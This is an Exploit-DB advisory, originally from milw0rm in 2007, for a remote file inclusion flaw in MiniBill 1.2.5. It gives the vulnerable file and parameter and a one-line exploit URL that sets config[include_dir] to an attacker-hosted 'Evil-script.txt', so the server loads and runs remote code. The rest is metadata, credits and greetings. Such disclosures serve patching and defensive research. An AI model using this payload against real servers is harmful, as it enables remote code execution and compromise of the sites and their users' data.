MiniBill 1.2.5 - 'run_billing.php' Remote File Inclusion

EDB-ID:

4079

Author:

Abo0od

Type:

webapps

Platform:

PHP

Published:

2007-06-18

=======================================================
MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities
=======================================================
Found By : Abo0od , abod@islam-attack.com
=======================================================
Homepage: http://www.hack-teach.org/cc
=======================================================
Script Site : http://www.ultrize.com/minibill/index.php?page=download
=======================================================
File: /crontab/run_billing.php <= $config['include_dir']
========================================================
Exploit:
site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt?
=======================================================
greets to : www.islam-attack.com
=======================================================

# milw0rm.com [2007-06-18]